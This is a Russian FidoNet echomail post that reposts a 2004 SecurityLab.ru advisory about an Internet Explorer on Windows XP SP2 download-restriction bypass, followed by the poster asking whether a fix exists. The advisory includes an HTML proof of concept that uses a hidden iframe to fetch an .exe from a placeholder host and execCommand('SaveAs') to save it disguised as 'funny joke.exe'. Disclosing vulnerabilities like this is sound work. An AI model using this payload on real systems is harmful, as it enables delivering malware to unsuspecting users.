MSGID: 2:5003/34.1 41e06feb

PID: GED+W32 1.1.5-021011

CHRS: CP866 2

TID: FastEcho 1.46 8215134
  Приветствую тебя, All!

-------------------
Обход ограничений в Microsoft IE на Windows XP SP2
Дата: 18:50 22.11.2004
Источник публикации: SecurityLab.ru
Программа: Microsoft Internet Explorer (IE) на Windows XP SP2
Опасность: Средняя

Hаличие эксплоита: Да

Описание:
Уязвимость обнаружена в Microsoft Internet Explorer на Windows XP SP2. Удаленный атакующий может загрузить на уязвимую систему произвольный файл.

Удаленный атакующий может с помощью специально сформированной web страницы обойти ограничения безопасности для 'File Download' и 'File Open' и загрузить произвольный файл на уязвимую систему. Уязвимость реализуется посредством ответа сервера на запрос сообщением HTTP 404 error и вызова метода execCommand. Пример:


< body>
< iframe src='http://your.domain.com/v.exe?.htm' name=
"NotFound" width="0" height="0">
Click document.execCommand('SaveAs',1,'funny joke.exe');">here.
< /body>
< /html>

URL производителя: www. microsoft.com

Решение: решение на данный момент не существует
-----------------------------------------

Hикто не подскажет, решили это дело на сегодняшний день или нет ?

  До встречи !
                 Alex                       Registered Linux user #344184 ---
---
* Origin: Sweet Home (2:5003/34.1)
SEEN-BY: 5003/5 6 17 34 38 47 52 53 57 76 81 83 84 86 87 98 118 132 133 134
SEEN-BY: 5003/135 138 151 180 5014/33

PATH: 5003/34 17